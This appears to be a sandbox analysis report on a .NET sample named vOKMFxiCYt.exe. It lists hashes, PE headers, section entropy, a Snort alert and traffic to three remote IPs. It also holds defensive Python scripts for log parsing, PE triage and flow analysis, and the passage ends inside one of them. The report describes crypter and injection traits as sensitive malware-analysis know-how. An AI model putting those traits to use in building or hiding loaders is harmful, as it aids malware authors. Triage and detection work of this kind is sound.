                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
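The only dropped file is the CLR usage log that the .NET runtime writes for a managed executable, which is why the report rates it "very likely benign" despite the Malicious flag: the file is a by-product of running a .NET assembly, not a payload. What it is good for in triage is the list of framework assemblies the loader bound. The parser below is an added example, not part of the Joe Sandbox report; its input is constructed from the preview above with the ".." record separators restored to line breaks, and the record layout it assumes (kind, display name, optional native-image path, flag) is inferred from that preview rather than taken from CLR documentation.

```python
"""Parse a CLR_v4.0_32\\UsageLogs\\<exe>.log dropped by a .NET sample (added example)."""
import csv
import io

# Constructed from the preview of vOKMFxiCYt.exe.log above; records that the
# report shows joined by ".." are written one per line here.
SAMPLE_LOG = r'''1,"fusion","GAC",0
1,"WinRT","NotApp",1
2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0
2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
'''


def parse_usage_log(text):
    """Return (kind, display_name, native_image_path) per assembly record.

    Assumed layout: kind 2 rows name an assembly bound by display name, kind 3
    rows also carry the NGEN native image path the binder resolved; kind 1
    rows are binder configuration and are skipped. The csv module handles the
    quoted display names, which themselves contain commas.
    """
    records = []
    for row in csv.reader(io.StringIO(text)):
        if not row:
            continue
        kind = row[0]
        if kind == "2" and len(row) >= 3:
            records.append((2, row[1], None))
        elif kind == "3" and len(row) >= 4:
            records.append((3, row[1], row[2]))
    return records


def simple_name(display_name):
    """'System.Core, Version=4.0.0.0, ...' -> 'System.Core'."""
    return display_name.split(",", 1)[0].strip()


def bound_assemblies(text):
    """Sorted simple names of every assembly the process bound."""
    return sorted({simple_name(name) for _kind, name, _path in parse_usage_log(text)})


def native_images(text):
    """Native image (.ni.dll) paths recorded in the log, in file order."""
    return [path for kind, _name, path in parse_usage_log(text) if kind == 3]


def uses_winforms_vb(text):
    """Triage signal: the loader bound the VB.NET plus WinForms stack."""
    return {"Microsoft.VisualBasic", "System.Windows.Forms"} <= set(bound_assemblies(text))


if __name__ == "__main__":
    print("bound:", ", ".join(bound_assemblies(SAMPLE_LOG)))
    print("native images:", native_images(SAMPLE_LOG))
    print("VB.NET WinForms stack:", uses_winforms_vb(SAMPLE_LOG))
```

Run against the real log the assembly list is the quickest way to confirm what the static TrID verdict (a .NET executable) already suggests and to spot unexpected bindings such as System.Reflection.Emit or System.Net in a sample that has no business needing them.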

                                                    Static File Info

                                                    General

                                                    File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit): 7.6186010890207205
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name: vOKMFxiCYt.exe
                                                    File size: 711168
                                                    MD5: bb30a5dd4130b071fb4ca5f005371c63
                                                    SHA1: 52c3ca02828a4ad8e8dbf790a61b3d77379ad391
                                                    SHA256: 4c73fd4286e76a094eefafe5369f3a184ca4a38d567ae6dfad61645bf968a83f
                                                    SHA512: 062f184dea6b1327418b7030b114cc40bf21072408fb9408bc18b823bce73534cf513a566ef16f90c0379581fb9e189d8d39614334c04c1607afbc02089ac0d1
                                                    SSDEEP: 12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
                                                    File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'._..............P.............n.... ........@.. ....................... ............@................................

File Icon

Icon Hash: 68f4d4f0f0f0d8c4

Static PE Info

General

Entrypoint: 0x4ad96e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5FB627B3 [Thu Nov 19 08:07:15 2020 UTC]
TLS Callbacks: none
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times in the preview: the bytes after the 6-byte jmp are zero padding, and 00 00 decodes as add byte ptr [eax], al)

The jmp target 0x00402000 is ImageBase 0x400000 plus RVA 0x2000, which the Data Directories table below identifies as the IAT (0x2000, size 0x8): the single imported pointer, mscoree.dll!_CorExeMain. This is the standard native stub through which a .NET executable hands control to the CLR, so nothing about the sample's behaviour can be read from the native entry point; the managed code in .text is where analysis starts.

Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xad91c         | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xae000         | 0x1a20       | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xb0000         | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy        | Characteristics
.text  | 0x2000          | 0xab974      | 0xaba00  | False    | 0.796825211672  | data      | 7.62841280925  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc  | 0xae000         | 0x1a20       | 0x1c00   | False    | 0.759068080357  | data      | 6.77634039509  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb0000         | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name          | RVA     | Size   | Type                                                                          | Language | Country
RT_ICON       | 0xae130 | 0x13de | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                   |          |
RT_GROUP_ICON | 0xaf510 | 0x14   | data                                                                          |          |
RT_VERSION    | 0xaf524 | 0x30c  | data                                                                          |          |
RT_MANIFEST   | 0xaf830 | 0x1ea  | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators   |          |

Imports

DLL         | Import
mscoree.dll | _CorExeMain
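
The Static PE Info, Data Directories, Sections and Imports tables above are what a static triage script reads off the file. The script below is an added example (not output of the sandbox, and not code of the analysed sample or of the report vendor), written in standard-library Python, that reproduces those checks: it parses the headers, computes per-section Shannon entropy, confirms that the CLR header (data directory 14, IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR) is present, and confirms that the entry point is the 6-byte `jmp dword ptr [IAT]` stub behind the single `mscoree.dll!_CorExeMain` import. Because the sample itself cannot be embedded here, `build_sample_pe()` constructs a minimal PE32 with the same geometry as the report (ImageBase 0x400000, IAT at RVA 0x2000, CLR header at RVA 0x2008, COFF timestamp 0x5FB627B3) and deterministic pseudo-random filler in .text standing in for an encrypted payload; the function names, the sample and the 7.2 bits/byte threshold are the example's own choices, not anything the report defines.

```python
import hashlib
import math
import struct
from collections import Counter
from datetime import datetime, timezone

IAT_DIR, CLR_DIR = 12, 14   # IMAGE_DIRECTORY_ENTRY_IAT, IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
HIGH_ENTROPY = 7.2          # bits per byte; plain x86 or CIL code sections sit well below this


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input or one repeated byte value)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(data: bytes) -> dict:
    """Read the header fields a static triage needs; handles PE32 and PE32+ layouts."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                          # optional header follows the COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                                     # PE32: 96 bytes of standard fields
        image_base, dirs_at = struct.unpack_from("<I", data, opt + 28)[0], opt + 96
    elif magic == 0x20B:                                   # PE32+: 112 bytes, 64-bit ImageBase
        image_base, dirs_at = struct.unpack_from("<Q", data, opt + 24)[0], opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    ndirs = struct.unpack_from("<I", data, dirs_at - 4)[0]
    dirs = [struct.unpack_from("<II", data, dirs_at + 8 * i) for i in range(min(ndirs, 16))]
    dirs += [(0, 0)] * (16 - len(dirs))                    # missing directories read as absent
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, *_, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "raw_ptr": rptr, "raw_size": rsize, "chars": chars,
                         "entropy": round(shannon_entropy(data[rptr:rptr + rsize]), 3)})
    stamp_utc = datetime.fromtimestamp(stamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
    return {"machine": machine, "image_base": image_base, "entry_rva": entry_rva,
            "dirs": dirs, "sections": sections, "timestamp_utc": stamp_utc}


def rva_to_offset(pe: dict, rva: int):
    """Map an RVA to (file offset, section name); (None, None) if no section contains it."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["raw_ptr"] + (rva - s["va"]), s["name"]
    return None, None


def triage(data: bytes) -> dict:
    """The checks behind the report's tables: CLR header present, entry point is the
    FF 25 <ImageBase + IAT RVA> stub that jumps through the IAT to mscoree!_CorExeMain
    (an absolute jmp, so this test is PE32-only), and which sections look packed."""
    pe = parse_pe(data)
    clr_rva, clr_size = pe["dirs"][CLR_DIR]
    iat_rva = pe["dirs"][IAT_DIR][0]
    off, section = rva_to_offset(pe, pe["entry_rva"])
    stub = data[off:off + 6] if off is not None else b""
    return {"is_dotnet": bool(clr_rva and clr_size),
            "entry_section": section,
            "entry_is_clr_stub": stub == b"\xff\x25" + struct.pack("<I", pe["image_base"] + iat_rva),
            "timestamp_utc": pe["timestamp_utc"],
            "entropy": {s["name"]: s["entropy"] for s in pe["sections"]},
            "packed_sections": [s["name"] for s in pe["sections"] if s["entropy"] >= HIGH_ENTROPY]}


def build_sample_pe() -> bytes:
    """Constructed sample, not the analysed file: one .text section laid out like the
    report (ImageBase 0x400000, IAT at RVA 0x2000, CLR header at 0x2008, entry point =
    jmp [0x402000]) with deterministic pseudo-random filler standing in for a payload."""
    text_va, text_raw, text_size, ep = 0x2000, 0x200, 0x1000, 0x50
    text = bytearray(b"".join(hashlib.sha256(bytes([i])).digest() for i in range(text_size // 32)))
    text[0:8 + 0x48] = bytes(8 + 0x48)                         # IAT slot + CLR header placeholder
    text[ep:ep + 6] = b"\xff\x25" + struct.pack("<I", 0x400000 + text_va)
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)         # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0x5FB627B3, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBB" "III" "III" "III" "HHHHHH" "I" "III" "HH" "IIIIII",
                      0x10B, 48, 0, text_size, 0, 0, text_va + ep, text_va, 0,
                      0x400000, 0x2000, 0x200, 4, 0, 0, 0, 4, 0, 0,
                      text_va + text_size, 0x200, 0, 2, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[IAT_DIR], dirs[CLR_DIR] = (text_va, 8), (text_va + 8, 0x48)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sect = struct.pack("<8sIIIIIIHHI", b".text", text_size, text_va, text_size, text_raw,
                       0, 0, 0, 0, 0x60000020)
    return (dos + coff + opt + sect).ljust(text_raw, b"\0") + bytes(text)
```

On a real file, `triage(open(path, "rb").read())` is all that is needed. Applied to the numbers in the Sections table, `.text` at 7.63 bits/byte would be flagged and `.reloc` at 0.10 would not; a .NET assembly whose only code section is that dense is normally a crypter stub carrying an encrypted second stage, which matches the process-injection and hollowing signatures listed at the top of the report.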

Version Infos

Description      | Data
Translation      | 0x0000 0x04b0
LegalCopyright   | Copyright 2014
Assembly Version | 1.0.0.0
InternalName     | Lqei.exe
FileVersion      | 1.0.0.0
CompanyName      |
LegalTrademarks  |
Comments         |
ProductName      | Blackjack
ProductVersion   | 1.0.0.0
FileDescription  | Blackjack
OriginalFilename | Lqei.exe

Network Behavior

Snort IDS Alerts

Timestamp                | Protocol | SID  | Message                         | Source Port | Dest Port | Source IP      | Dest IP
11/20/20-20:05:47.333897 | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden  | 80          | 49737     | 34.102.136.180 | 192.168.2.3

SID 1201 matches on a server's HTTP 403 response, so the direction here (port 80 to client port 49737) means the host 34.102.136.180 refused the sample's request; the packet is the reply at 20:05:47.333897 in the 49737 session of the TCP list below, not an attack by the sample against that host.

Network Port Distribution

(chart not reproduced in this extract; the packet lists below give the observed connections)

TCP Packets

Timestamp                           | Source Port | Dest Port | Source IP      | Dest IP
Nov 20, 2020 20:05:26.573868990 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.686641932 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:26.686763048 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.687122107 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.799868107 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:26.800371885 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:26.800390959 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:26.800730944 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.800884962 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.913804054 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:47.201289892 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.217951059 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:05:47.218205929 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.218628883 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.235160112 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:05:47.333897114 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:05:47.333945990 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:05:47.334137917 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.334182978 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.350737095 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:06:07.638340950 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.740331888 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.740473032 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.740803957 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.842596054 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845019102 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845062017 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845097065 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845140934 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845160007 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.845180035 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845208883 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.845216036 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845251083 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845271111 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.845287085 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845320940 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845355988 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.845359087 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.845417023 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947180033 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947225094 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947264910 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947304964 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947346926 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947355986 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947400093 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947413921 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947438002 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947479963 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947495937 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947539091 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947577000 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947582960 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947617054 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947632074 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947655916 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947694063 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947731972 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947767973 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947770119 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947818995 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947850943 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947861910 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947900057 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947900057 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947940111 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.947969913 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.947978973 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:07.948054075 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:08.049653053 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049686909 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049711943 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049737930 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049762011 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049788952 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049796104 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:08.049814939 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049840927 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049865007 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049890041 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049913883 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049937010 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049961090 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049987078 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.049988985 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:08.050012112 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050035000 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050057888 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050080061 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050084114 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:08.050103903 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050144911 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050153017 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:08.050172091 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050195932 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050219059 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050241947 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
Nov 20, 2020 20:06:08.050255060 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:08.050273895 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
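
The TCP list above is a packet-level view; what a detection engineer wants from it is the flow view: three short HTTP sessions from 192.168.2.3, one per remote host, opened about 20 seconds apart (20:05:26, 20:05:47, 20:06:07), each lasting well under a second, with the Snort 403 landing in the second one and the third carrying a much larger server-to-client packet train than the first two. The script below is an added example (not part of the report and not the vendor's code) that rebuilds flows from rows written as `timestamp | src port | dst port | src ip | dst ip`, flags the fan-out pattern (several distinct port-80 servers contacted within one window, each session short-lived) and ties the Snort alert back to its flow. The sample rows are copied from the table above (sessions 49728 and 49737 in full, session 49739 cut to its first two packets), `192.168.2.3` is taken from the table as the analysis host, and the window, host-count and duration defaults are the example's own choices.

```python
import re
from datetime import datetime

# Constructed input: rows copied from the TCP packet table above (sessions 49728 and
# 49737 in full, session 49739 cut to its first two packets), written as
# "timestamp | src port | dst port | src ip | dst ip".
PACKETS = """
Nov 20, 2020 20:05:26.573868990 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.686641932 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:26.686763048 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.687122107 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.799868107 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:26.800371885 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:26.800390959 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:26.800730944 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.800884962 CET | 49728 | 80 | 192.168.2.3 | 3.138.72.189
Nov 20, 2020 20:05:26.913804054 CET | 80 | 49728 | 3.138.72.189 | 192.168.2.3
Nov 20, 2020 20:05:47.201289892 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.217951059 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:05:47.218205929 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.218628883 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.235160112 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:05:47.333897114 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:05:47.333945990 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:05:47.334137917 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.334182978 CET | 49737 | 80 | 192.168.2.3 | 34.102.136.180
Nov 20, 2020 20:05:47.350737095 CET | 80 | 49737 | 34.102.136.180 | 192.168.2.3
Nov 20, 2020 20:06:07.638340950 CET | 49739 | 80 | 192.168.2.3 | 198.49.23.141
Nov 20, 2020 20:06:07.740331888 CET | 80 | 49739 | 198.49.23.141 | 192.168.2.3
"""
# The Snort row from the report: 403 Forbidden from 34.102.136.180:80 to 192.168.2.3:49737.
ALERT = {"src": "34.102.136.180", "sport": 80, "dst": "192.168.2.3", "dport": 49737}
TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) \w+$")


def parse_ts(text: str) -> datetime:
    """Sandbox timestamps carry nanoseconds; datetime holds microseconds, so truncate."""
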